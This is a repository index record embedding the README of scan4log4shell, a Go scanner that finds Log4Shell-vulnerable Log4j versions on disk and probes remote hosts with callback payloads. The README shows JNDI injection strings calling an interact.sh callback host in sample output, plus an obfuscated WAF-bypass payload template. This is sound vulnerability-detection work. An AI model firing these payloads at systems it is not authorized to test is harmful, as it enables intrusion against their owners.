{"id":13842058,"url":"https://github.com/hupe1980/scan4log4shell","last_synced_at":"2026-03-16T08:31:46.171Z","repository":{"id":43865954,"uuid":"437756128","full_name":"hupe1980/scan4log4shell","owner":"hupe1980","description":"Scanner to send specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability and to detect vulnerable log4j versions on your local file-system","archived":false,"fork":false,"pushed_at":"2022-02-15T13:04:54.000Z","size":3385,"stargazers_count":12,"open_issues_count":1,"forks_count":3,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-04-16T01:55:21.135Z","etag":null,"topics":["auth","blue-team","cve-2021-44228","cve-2021-45046","cve-2021-45105","dns","form-detection","fuzzing","log4j","log4shell","rce","red-team","scanner","vulnerability","waf-bypass"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/hupe1980.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-12-13T06:09:04.000Z","updated_at":"2024-10-16T16:00:40.000Z","dependencies_parsed_at":"2022-09-22T11:40:44.836Z","dependency_job_id":null,"html_url":"https://github.com/hupe1980/scan4log4shell","commit_stats":null,"previous_names":[],"tags_count":46,"template":false,"template_full_name":null,"purl":"pkg:github/hupe1980/scan4log4shell","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fscan4log4shell","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fscan4log4shell/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fscan4log4shell/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fscan4log4shell/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/hupe1980","download_url":"https://codeload.github.com/hupe1980/scan4log4shell/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/hupe1980%2Fscan4log4shell/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259855471,"owners_count":22922313,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["auth","blue-team","cve-2021-44228","cve-2021-45046","cve-2021-45105","dns","form-detection","fuzzing","log4j","log4shell","rce","red-team","scanner","vulnerability","waf-bypass"],"created_at":"2024-08-04T17:01:26.683Z","updated_at":"2026-03-16T08:31:46.137Z","avatar_url":"https://github.com/hupe1980.png","language":"Go","readme":"# scan4log4shell\n\u003e Scanner to send specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability and to detect vulnerable log4j versions on your local file-system\n\n## Features\n- [Local](#local) and [remote](#remote) scanner\n- Supports URL and CIDR scans\n- Supports DNS, LDAP \u0026 TCP callbacks for vulnerability discovery and validation\n- Fuzzing of 50 [HTTP request headers](internal/resource/header.txt) by default\n- Fuzzing of HTTP POST data parameters\n- Fuzzing of JSON data parameters\n- HTTP Form detection \u0026 fuzzing\n- Auth detection \u0026 fuzzing (Basic \u0026 Bearer)\n- [WAF Bypass payloads](internal/resource/bypass.txt)\n\n## Background\n[CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) is a remote code execution (RCE) vulnerability in Apache Log4j 2. An unauthenticated, remote attacker could exploit this flaw by sending a specially crafted request to a server running a vulnerable version of log4j. The crafted request uses a Java Naming and Directory Interface (JNDI) injection via a variety of services including:\n- Lightweight Directory Access Protocol (LDAP)\n- Secure LDAP (LDAPS)\n- Remote Method Invocation (RMI)\n- Domain Name Service (DNS)\n\n:warning: There is a patch bypass on Log4J v2.15.0: [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046) \n\n:warning: Log4J v2.16 High Severity Vulnerability discovered: [CVE-2021-45105](https://nvd.nist.gov/vuln/detail/CVE-2021-45105)\n## Installing\nYou can install the pre-compiled binary in several different ways\n\n### homebrew tap:\n```bash\nbrew tap hupe1980/scan4log4shell\nbrew install scan4log4shell\n```\n### scoop:\n```bash\nscoop bucket add scan4log4shell https://github.com/hupe1980/scan4log4shell-bucket.git\nscoop install scan4log4shell\n```\n\n### deb/rpm/apk:\n\nDownload the .deb, .rpm or .apk from the [releases page](https://github.com/hupe1980/scan4log4shell/releases) and install them with the appropriate tools.\n\n### manually:\nDownload the pre-compiled binaries from the [releases page](https://github.com/hupe1980/scan4log4shell/releases) and copy to the desired location.\n\n## Building from source\nInstall a [Go 1.17 compiler](https://golang.org/dl).\nMost system Go compiler come with OS are older than 1.17.\n\nRun the following command in the checked-out repository:\n\n```\nmake build\n```\n\n(Add the appropriate .exe extension on Windows systems, of course.)\n\n## Docker Support\n```bash\ngit clone https://github.com/hupe1980/scan4log4shell\ncd scan4log4shell\nmake docker-build\n\n# Scan the current working directory\ndocker run -it --rm -v $PWD:/data scan4log4shell local /data\n```\n\n## Usage \n```console\nUsage:\n  scan4log4shell [command]\n\nAvailable Commands:\n  catch       Start a standalone callback catcher\n  completion  Prints shell autocompletion scripts for scan4log4shell\n  help        Help about any command\n  local       Detect vulnerable log4j versions on your file-system\n  remote      Send specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability\n\nFlags:\n  -h, --help            help for scan4log4shell\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n      --version         version for scan4log4shell\n\nUse \"scan4log4shell [command] --help\" for more information about a command.\n```\n\n## Catch\nStart a standalone callback catcher\n```console\nUsage:\n  scan4log4shell catch [tcp | dns | ldap] [flags]\n\nExamples:\n- Start a standalone dns catcher: scan4log4shell catch dns\n- Start a standalone ldap catcher: scan4log4shell catch ldap --caddr 127.0.0.1:4444\n- Start a standalone tcp catcher: scan4log4shell catch tcp --caddr 127.0.0.1:4444\n\nFlags:\n      --caddr string   address to catch the callbacks (eg. ip:port)\n  -h, --help           help for catch\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n```\n\n## Local\nDetect vulnerable log4j versions on your file-system\n```console\nUsage:\n  scan4log4shell local [paths] [flags]\n\nExamples:\n- Scan /var/www: scan4log4shell local /var/www\n- Ignore zip \u0026 aar: scan4log4shell local . --ignore-ext .zip --ignore-ext .aar\n\nFlags:\n  -e, --exclude stringArray      path to exclude\n  -h, --help                     help for local\n      --ignore-cve-2021-45046    ignore CVE-2021-45046\n      --ignore-cve-2021-45105    ignore CVE-2021-45105\n      --ignore-ext stringArray   ignore .jar | .zip | .war | .ear | .aar\n      --ignore-v1                ignore log4j 1.x versions\n      --max-threads int          max number of concurrent threads (default 5)\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n```\n\n### Example\n```bash\nmake run-local\n\nscanner_1  | [i] Log4Shell CVE-2021-44228 Local Vulnerability Scan\nscanner_1  | [i] Start scanning path /walk\nscanner_1  | ---------\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-1.2-api-2.14.0-javadoc.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-1.2-api-2.14.0-sources.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-1.2-api-2.14.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-api-2.14.0-javadoc.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-api-2.14.0-sources.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-api-2.14.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar...\nscanner_1  | [!] Hit: possibly CVE-2021-45046 vulnerable file identified: /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar\nscanner_1  | [!] Hit: possibly CVE-2021-45105 vulnerable file identified: /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar\nscanner_1  | [!] Hit: possibly CVE-2021-44228 vulnerable file identified: /walk/apache-log4j-2.14.0-bin/log4j-core-2.14.0.jar\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.15.0-bin/log4j-api-2.15.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar...\nscanner_1  | [!] Hit: possibly CVE-2021-45046 vulnerable file identified: /walk/apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar\nscanner_1  | [!] Hit: possibly CVE-2021-45105 vulnerable file identified: /walk/apache-log4j-2.15.0-bin/log4j-core-2.15.0.jar\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.15.0-bin/log4j-spring-boot-2.15.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.16.0-bin/log4j-api-2.16.0.jar...\nscanner_1  | [i] Inspecting /walk/apache-log4j-2.16.0-bin/log4j-core-2.16.0.jar...\nscanner_1  | [!] Hit: possibly CVE-2021-45105 vulnerable file identified: /walk/apache-log4j-2.16.0-bin/log4j-core-2.16.0.jar\nscanner_1  | [i] Inspecting /walk/jakarta-log4j-1.2.8/dist/lib/log4j-1.2.8.jar...\nscanner_1  | [!] Hit: log4j V1 identified: /walk/jakarta-log4j-1.2.8/dist/lib/log4j-1.2.8.jar\nscanner_1  | [i] Completed scanning\n```\n\n## Remote\nSend specially crafted requests and catch callbacks of systems that are impacted by log4j log4shell vulnerability\n```console\nUsage:\n  scan4log4shell remote [command]\n\nAvailable Commands:\n  cidr        Send specially crafted requests to a cidr\n  url         Send specially crafted requests to an url\n\nFlags:\n  -h, --help   help for remote\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n```\n\n### Remote CIDR\nSend specially crafted requests to a cidr\n```console\nUsage:\n  scan4log4shell remote cidr [cidr] [flags]\n\nExamples:\n- Scan a complete cidr: scan4log4shell remote cidr 172.20.0.0/24\n- TCP catcher: scan4log4shell remote cidr 172.20.0.0/24 --catcher-type tcp --caddr 172.20.0.30:4444\n- Custom headers file: scan4log4shell remote cidr 172.20.0.0/24 --headers-file ./headers.txt\n- Run all tests: scan4log4shell remote cidr 172.20.0.0/24 -a\n\nFlags:\n  -a, --all                         shortcut to run all checks\n      --auth-fuzzing                add auth fuzzing\n      --basic-auth string           basic auth credentials (eg. user:pass)\n      --caddr string                address to catch the callbacks (eg. ip:port)\n      --catcher-type string         type of callback catcher (dns | ldap | tcp | none) (default \"dns\")\n      --check-cve-2021-45046        check for CVE-2021-45046\n      --field strings               field to use\n      --fields-file string          use custom field from file\n      --form-fuzzing                add form submits to fuzzing\n      --header strings              header to use\n      --headers-file string         use custom headers from file\n  -h, --help                        help for cidr\n      --max-threads int             max number of concurrent threads (default 150)\n      --no-redirect                 do not follow redirects\n      --no-user-agent-fuzzing       exclude user-agent header from fuzzing\n      --no-wait-timeout             wait forever for callbacks\n      --param strings               query param to use\n      --params-file string          use custom query params from file\n      --payload strings             payload to use\n      --payloads-file string        use custom payloads from file\n  -p, --port strings                port to scan (default [8080])\n      --proxy string                proxy url\n  -r, --resource string             resource in payload (default \"l4s\")\n      --schema string               schema to use for requests (default \"https\")\n      --set-field stringToString    set fix field value (key=value) (default [])\n      --set-header stringToString   set fix header value (key=value) (default [])\n      --set-param stringToString    set fix query param value (key=value) (default [])\n      --timeout duration            time limit for requests (default 3s)\n  -t, --type strings                get, post or json (default [get])\n      --waf-bypass                  extend scans with WAF bypass payload\n  -w, --wait duration               wait time to catch callbacks (default 5s)\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n```\n\n### Remote url\nSend specially crafted requests to an url\n```console\nUsage:\n  scan4log4shell remote url [urls] [flags]\n\nExamples:\n- Scan a url: scan4log4shell remote url https://target.org\n- Scan multiple urls: scan4log4shell remote url https://target1.org https://target2.org\n- Scan multiple urls: cat targets.txt | scan4log4shell remote url\n- TCP catcher: scan4log4shell remote url https://target.org --catcher-type tcp --caddr 172.20.0.30:4444\n- Custom headers file: scan4log4shell remote url https://target.org --headers-file ./headers.txt\n- Scan url behind basic auth: scan4log4shell remote url https://target.org --basic-auth user:pass\n- Run all tests: scan4log4shell remote url https://target.org -a\n\nFlags:\n  -a, --all                         shortcut to run all checks\n      --auth-fuzzing                add auth fuzzing\n      --basic-auth string           basic auth credentials (eg. user:pass)\n      --caddr string                address to catch the callbacks (eg. ip:port)\n      --catcher-type string         type of callback catcher (dns | ldap | tcp | none) (default \"dns\")\n      --check-cve-2021-45046        check for CVE-2021-45046\n      --field strings               field to use\n      --fields-file string          use custom field from file\n      --form-fuzzing                add form submits to fuzzing\n      --header strings              header to use\n      --headers-file string         use custom headers from file\n  -h, --help                        help for url\n      --max-threads int             max number of concurrent threads (default 150)\n      --no-redirect                 do not follow redirects\n      --no-user-agent-fuzzing       exclude user-agent header from fuzzing\n      --no-wait-timeout             wait forever for callbacks\n      --param strings               query param to use\n      --params-file string          use custom query params from file\n      --payload strings             payload to use\n      --payloads-file string        use custom payloads from file\n      --proxy string                proxy url\n  -r, --resource string             resource in payload (default \"l4s\")\n      --set-field stringToString    set fix field value (key=value) (default [])\n      --set-header stringToString   set fix header value (key=value) (default [])\n      --set-param stringToString    set fix query param value (key=value) (default [])\n      --timeout duration            time limit for requests (default 3s)\n  -t, --type strings                get, post or json (default [get])\n      --waf-bypass                  extend scans with WAF bypass payload\n  -w, --wait duration               wait time to catch callbacks (default 5s)\n\nGlobal Flags:\n      --no-color        disable color output\n  -o, --output string   output logfile name\n  -v, --verbose         print detailed logging messages\n```\n### Example\n```bash\nmake run-remote\n\nscanner_1  | [i] Log4Shell Remote Vulnerability Scan\nscanner_1  | [i] Listening on c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh\nscanner_1  | [i] Start scanning CIDR 172.20.0.0/24\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.0:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.1:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.2:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.3:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.4:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.5:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.6:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.7:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.8:8080 [GET]\nscanner_1  | [!] Possibly vulnerable host identified: 172.20.0.3\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.9:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.10:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.11:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.12:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.13:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.14:8080 [GET]\nscanner_1  | [i] Checking ${jndi:ldap://c6vgseoaa6gikh9v1ekgcg9ohxoyyyyyn.interact.sh/l4s} for http://172.20.0.15:8080 [GET]\nscanner_1  | [!] Possibly vulnerable host identified: 172.20.0.13\n```\n\n### Custom Payloads\nIf you specify a file with custom payloads, you can use the following placeholders for callback address and resource:\n- {{ .CADDR }}\n- {{ .Resource }}\n\nFor example: \n```\n${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//{{ .CADDR }}/{{ .Resource }}}\n```\nYou can find more examples [here](internal/resource/bypass.txt)\n\n## References\n- https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592\n- https://logging.apache.org/log4j/2.x/security.html\n- https://nvd.nist.gov/vuln/detail/CVE-2021-44228\n- https://nvd.nist.gov/vuln/detail/CVE-2021-45046\n- https://nvd.nist.gov/vuln/detail/CVE-2021-45105\n\n\n## License\n[MIT](LICENCE)\n","funding_links":[],"categories":["Go"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhupe1980%2Fscan4log4shell","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fhupe1980%2Fscan4log4shell","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fhupe1980%2Fscan4log4shell/lists"}